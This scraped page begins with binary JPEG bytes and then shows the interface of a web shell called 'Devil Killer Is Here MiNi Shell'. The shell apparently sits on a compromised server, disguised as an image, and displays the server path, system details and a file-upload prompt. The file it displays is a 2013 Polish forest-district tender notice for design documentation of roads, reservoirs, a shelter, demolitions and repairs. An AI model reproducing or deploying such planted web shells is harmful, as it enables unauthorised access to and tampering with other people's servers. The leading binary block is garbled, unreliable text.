JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131212/269993-N-2013.html

<p class="kh_header"><b>Sulechów: Wykonanie dokumentacji projektowej</b><br>
<b>Numer ogłoszenia: 269993 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Sulechów , ul. Bankowa 2, 66-100 Sulechów, woj. lubuskie, tel. 068 3852042, faks 068 3852042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_zielona_gora/nadl_sulechow/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie 8 odrębnych dokumentacji (części) projektowo - kosztorysowych dla przewidzianych do realizacji zadań gospodarczych w zakresie:

1. Przebudowy drogi leśnej stanowiącej dojazd pożarowy nr 1.
Przebudowywany dojazd znajduje się na terenie leśnictwa Brody i Przetocznica w Gminie Sulechów - powiat Zielonogórski oraz w Gminie Skąpe - powiat Świebodziński. Długość przebudowywanej drogi wynosi w przybliżeniu 8,1 km. 

2. Budowy trzech otwartych zbiorników wodnych o wielofunkcyjnym przeznaczeniu.
Ogólne założenia projektowe:
a)	projektowany wielofunkcyjny zbiornik wodny nr 32 wraz z placem manewrowym znajduję się w bezpośrednim sąsiedztwie drogi publicznej nr 005523F, relacji Krężoły-Klępsk, w leśnictwie Klępsk. Realizacja zadania wymagać będzie wycięcia drzewostanu. Koniecznym będzie uzgodnienie zjazdu z drogi publicznej i wynikającego z uzgodnienia utwardzenia dojazdu dla sprzętu pożarowego do zbiornika. 
b)	miejsce budowy wielofunkcyjnego zbiornika wodnego wraz z placem manewrowym znajduje się przy dojeździe pożarowym w leśnictwie Sycowice. Realizacja zadania wymagać będzie wycięcia drzewostanu. W ramach przedsięwzięcia zasadnym będzie przebudowanie skrzyżowania w celu umożliwienia swobodnego dojazdu i wyjazdu ze zbiornika w czterech kierunkach kompleksu leśnego.
c)	trzeci projektowany zbiornik znajduje się w leśnictwie Kije. WAŻNE - zamawiający zastrzega sobie prawo do redukcji bądź rezygnacji z tego zadania przy proporcjonalnej redukcji wynagrodzenia.    

3. Wykonania trzech miejsc postoju pojazdów (MPP).
Ogólne założenia projektowe:
a)	powierzchnia do 0,5 ha, lokalizacja przy drodze o utwardzonej nawierzchni z utwardzonym wjazdem i zjazdem,
b)	utwardzenie nawierzchni kruszywami tradycyjnymi lub przy użyciu technologii mieszania gruntu rodzimego ze stabilizatorem na wjeździe i zjeździe strefie   manewrowej parkujących pojazdów i strefie postoju. Pozostała cześć pozostaje w gruncie naturalnym,
c)	oznakowanie MPP tablicami informacyjnymi oraz znakami drogowymi,
d)	zaprojektowanie posadowienia urządzeń turystycznych wg wskazań zamawiającego. Ilość i rodzaj urządzeń określa załącznik do SIWZ. 
Lokalizacja:
- MPP 1.1 Kartno - przy drodze woj. nr 278 - leśnictwo Bojadła oddz. 226g,
- MPP 1.2 Będów - przy drodze woj. nr 278 - leśnictwo Będów oddz. 152a,
- MPP 1.3 Przetocznica - przy drodze woj. nr 276 - leśnictwo Przetocznica oddz. 126b.
 
4. Budowy wiaty turystyczno-edukacyjnej przy leśniczówce Klępsk.
Ogólne założenia projektowe:
Przedmiotem projektu jest wolnostojąca, parterowa, zamykana wiata w konstrukcji drewnianej wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu przyległego (ogrodzenie, ścieżki, chodniki, tablice edukacyjne, przyrządy edukacyjne itp.). Obiekt wyposażony będzie w: instalację elektryczną, alarmową, wentylacyjną, sanitarną, wodno-kanalizacyjną z ekologiczną oczyszczalnią ścieków, palenisko typu grill obudowany  w kamieniu, posadzkę kamienną i drewnianą. W swej bryle ma zawierać aneks kuchenny  i węzeł sanitarny. Projektowany obiekt wiaty spełniać będzie funkcję w zakresie edukacji przyrodniczo-leśnej, w powiązaniu z funkcją rekreacyjną. Użytkowany będzie doraźnie. Mogący pomieścić min. 100 osób. Przybliżone parametry techniczne obiektu: pow. zabudowy do 200 m2, wysokość ok. 5m.     

5. Konserwacji nawierzchni dróg leśnych.
Założenia projektowe: 
a)	zaprojektowanie wyrównania profilu jezdni,
b)	zaprojektowanie uzupełnienia kolein mieszanką naturalną,
c)	zaprojektowanie profilowania poboczy i rowów, 
d)	zaprojektowanie zagęszczenia wyprofilowanych dróg i poboczy, 
e)	zaprojektowanie humusowania poboczy. 
Wszystkie dojazdy wykonane w kruszywie naturalnym. 
Lokalizacja:
 a)	Dojazd pożarowy nr 9. Położony w leśnictwie Będów oraz Sycowice. Długość drogi 5,88 km. Rok budowy 2005. 
b)	Dojazd pożarowy nr 11. Położony w leśnictwie Stary Dwór. Długość drogi 3,27 km. Rok budowy 2011. 
c)	Dojazd pożarowy nr 30. Położony w leśnictwie Klenica. Długość drogi 1,14 km. Rok budowy 1999.
d)	Dojazd pożarowy nr 33. Położony w leśnictwie Trzebiechów. Długość drogi 2,09 km. Rok budowy 2011.
e)	Dojazd pożarowy nr 34. Położony w leśnictwie Klępsk oraz Trzebiechów. Długość drogi 7,01 km. Rok budowy 2007. 

6. Rozbiórki zbędnych budynków i budowli.
Przedmiot zamówienia:
a)	Rozbiórka obiektów po zlikwidowanej szkółce leśnej przy m. Siadcza, w tym:
- chłodni, zlokalizowanej na dz. nr 64, obręb ew. Siadcza, Gm. Bojadła. Obiekt murowany, zamykany. WAŻNE - zamawiający dopuszcza inne rozwiązanie projektowe jak przebudowanie obiektu na cele przyrodnicze. 
- instalacji wodociągowej wraz z podziemną infrastrukturą liniową i naziemnym budynkiem po byłej hydroforni, zlokalizowanej na dz. nr 52/1, obręb ew. Karszyn, Gm. Kargowa. 
b)	Rozbiórka dwóch magazynów paliw. 
- Obiekty murowane, zamykane, bez instalacji podziemnej. Jeden znajduje się przy leśniczówce leśnictwa Brody w Pomorsku (dz. 315/5), drugi przy leśniczówce Konotop (dz. 230/2) w Konotopie.  
c)	Rozbiórka stalowego zbiornika wodnego do celów pożarowych w leśnictwie Brody.
- zbiornik podziemny o poj. 50m3, zlokalizowany na dz. nr 258, obręb ewid. Brody, Gm. Sulechów.    
d)	Rozbiórka obiektów gospodarczych, w tym:
- szopa przy siedzibie leśnictwa Klępsk w Klępsku, nr inw. 108/86,
- budynek gospodarczy przy siedzibie leśnictwa Stary Dwór w Laskowie, nr inw. 108/69. 

7. Remontu dostrzegalni ppoż. i masztu antenowego.
Zakres rzeczowy planowanych robót:
a) Remont dostrzegalni Radowice                                        
- czyszczenie i malowanie całej konstrukcji,
- remont i malowanie ogrodzenia.
b) Remont dostrzegani Siadcza
- wykonanie zapraw malarskich,
- remont ogrodzenia.
c) Remont dostrzegalni Przetocznica
- wykonanie zapraw malarskich,
- remont ogrodzenia.
d) Remont masztu antenowego przy siedzibie Nadleśnictwa w Sulechowie. 
- odnowienie powłok malarskich. 

8. Remontu mieszkań i budynków gospodarczych. 
a) Osada leśnictwa Klępsk:
- leśniczówka: wymiana ogrodzenia zewnętrznego, ocieplenie poddasza, wymiana zewnętrznej stolarki drzwiowej, naprawa instalacji elektrycznej.
b) Osada leśnictwa Trzebiechów:
- leśniczówka: remont ogrodzenia zewnętrznego osady, montaż bufora instalacji c.o., naprawa instalacji elektrycznej.
c) Osada leśnictwa Cigacice: 
-  leśniczówka: wykonanie przyłącza do sieci kanalizacyjnej, naprawa instalacji elektrycznej.
d) Osada leśnictwa Stary Dwór:
- leśniczówka: wykonanie nawiewu w kotłowni, założenie wkładu kominowego, wykonanie zadaszenia kominów wentylacyjnych, naprawa instalacji elektrycznej;
- budynki gospodarcze: naprawa instalacji odgromowej, naprawa stolarki drzwiowej  i okiennej - 2 obiekty.
e) Osada leśnictwa Kije:
- leśniczówka: częściowe ogrodzenie osady, naprawa instalacji elektrycznej, zatrzymanie korozji biologicznej schodów wewnętrznych. 
f) Osada leśnictwa Brody: 
- leśniczówka: remont komina dymowego, wymiana zewnętrznej furtki wejściowej, wymiana drzwi do kotłowni, wymiana okna dachowego, naprawa instalacji elektrycznej,
-  budynki gospodarcze: naprawa instalacji odgromowej, naprawa stolarki drzwiowej  i okiennej - 2 obiekty.
g) Osada leśnictwa Będów:
- leśniczówka: naprawa instalacji elektrycznej,
- budynek gospodarczy: naprawa instalacji elektrycznej, naprawa stolarki drzwiowej  i okiennej.
h) Osada leśnictwa Przetocznica:
- leśniczówka: remont ogrodzenia zewnętrznego, remont tarasu.
i) Osada leśnictwa Bojadła:
- leśniczówka: wymiana drzwi wejściowych do piwnicy, wykonanie instalacji c.o. na poddaszu mieszkalnym, naprawa instalacji elektrycznej, utwardzenie placu przed garażem.
j) Osada leśnictwa Klenica:
- leśniczówka: naprawa wiatrołapu, naprawa instalacji elektrycznej,
- budynek gospodarczy: naprawa stolarki okiennej i drzwiowej, remont instalacji odgromowej, remont instalacji elektrycznej.     

Wartość szacunkowa poszczególnych części zamówienia wynosi:

- część 1 Przebudowa dojazdu pożarowego nr 1 - 45 000,00 zł.
- cześć 2 Budowa trzech otwartych zbiorników wodnych o wielofunkcyjnym przeznaczeniu pożarowym i przyrodniczym - 45 000 zł. 
- część 3 Wykonanie projektu miejsca postoju pojazdów (MPP) - 13 500,00 zł. 
- część 4 Budowa wiaty turystyczno-edukacyjnej przy leśniczówce Klępsk - 10 000,00 zł. 
- cześć 5 Konserwacja nawierzchni dróg leśnych - 27 000,00 zł. 
- cześć 6 Rozbiórka zbędnych budynków i budowli - 14 000 zł. 
- cześć 7 Remont dostrzegalni przeciwpożarowych i masztu antenowego - 11 375,00 zł.
- cześć 8 Remont mieszkań i budynków gospodarczych - 33 875,00 zł.

Wykonawca może złożyć ofertę na dowolną liczbę części zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż przewiduje możliwość udzielenia zamówień uzupełniających o wartości do 50 % wartości każdej części zamówienia, na zasadach określonych w art. 67 ust. 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.24.40.00-0, 71.24.80.00-8, 71.32.20.00-1, 71.53.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku zamawiający uzna posiadanie przez wykonawcę uprawnienia budowlanego zezwalającego do projektowania bez ograniczeń bądź z ograniczeniami lecz zezwalającymi na projektowanie w specjalnościach obejmujących poszczególne części zamówienia. 
Zamawiający żąda załączenia dokumentu, że wykonawca posiada takie uprawnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części 1,2,5 - zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże się, że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków  o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy zamówienia o podobnym charakterze do przedmiotu zamówienia. Zamawiający żąda aby wykonawca wykazał się doświadczeniem:
- w projektowaniu przebudowy dróg leśnych o łącznej długości min. 10 km,
- w projektowaniu otwartych zbiorników wodnych o wielofunkcyjnym przeznaczeniu o łącznej długości min. 5 szt.
- w projektowaniu konserwacji nawierzchni dróg leśnych o łącznej długości min. 20 km. 
Ocena spełnienia przez wykonawców niniejszego warunku zostanie dokonania na podstawie złożonego wykazu usług z podaniem ich rodzaju i wartości, daty i miejsca wykonania, podmiotu na rzecz którego usługa została wykonana z załączeniem dowodów, że usługi zostały wykonane lub są wykonywane  należycie. Wzór wykazu stanowi załącznik do SIWZ. 
Zamawiający żąda złożenia wykazu wykonanych usług.  
Dla części 3,4,6,7,8 -  zamawiający nie stawia wymagań dotyczących tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnych wymagań dotyczących dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda  wykazania, że wykonawca dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w branżach odpowiednich do poszczególnych części zamówienia bądź bez ograniczeń.
Ocena spełnienia przez wykonawców niniejszego warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu przedmiotu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (projektowych, kontrolnych) oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik do SIWZ.
Zamawiający żąda złożenia wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia. 

Zamawiający żąda złożenia oświadczenia, że osoba-y, która-e będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli wykonawca wykaże się opłaconą polisą, a w przypadku jej braku, innym dokumentem potwierdzającym, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200 000 zł. - bez względu na ilość części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Dla części 1,2,5 - zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże się, że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków  o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy zamówienia o podobnym charakterze do przedmiotu zamówienia. Zamawiający żąda aby wykonawca wykazał się doświadczeniem:
- w projektowaniu przebudowy dróg leśnych o łącznej długości min. 10 km,
- w projektowaniu otwartych zbiorników wodnych o wielofunkcyjnym przeznaczeniu o łącznej długości min. 5 szt.
- w projektowaniu konserwacji nawierzchni dróg leśnych o łącznej długości min. 20 km.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto oferta musi zawierać :
a)   wypełniony formularz ofertowy wg załączonego druku zał. nr 1 do SIWZ,  
b)	pełnomocnictwo podmiotów występujących wspólnie (konsorcjum) - wymagana forma dokumentu oryginał, jeżeli wykonawcy powołali konsorcjum,
c)	wykaz części zamówienia, którą wykonawca zamierza powierzyć do wykonania podwykonawcom - zawarty jest w załączniku nr 1, formularza ofertowego.

1.	Na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane oraz art. 26 ust. 2 Pzp, na potwierdzenie spełniania warunków udziału w postępowaniu zamawiający żąda następujących dokumentów:
a)	oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Pzp wg. wzoru - załącznik nr 3,
b)	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz którego usługi zostały wykonane, oraz załączeniem dowodu potwierdzającego, że te usługi zostały wykonane lub wykonywane należycie - załącznik nr 4.
Dotyczy części 1, 2 i 5
Dowodami są:
- poświadczenie,
- inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, zgodne z wydanym rozporządzeniem.
W przypadku złożenia innych dokumentów wykonawca przedstawia uzasadnienie braku możliwości uzyskania dowodu w postaci poświadczenia.
Wykonawca nie ma obowiązku przedkładania dowodów, w przypadku jeśli usługi wskazane w ww. wykazie zostały wcześniej wykonane na rzecz Nadleśnictwa Sulechów.
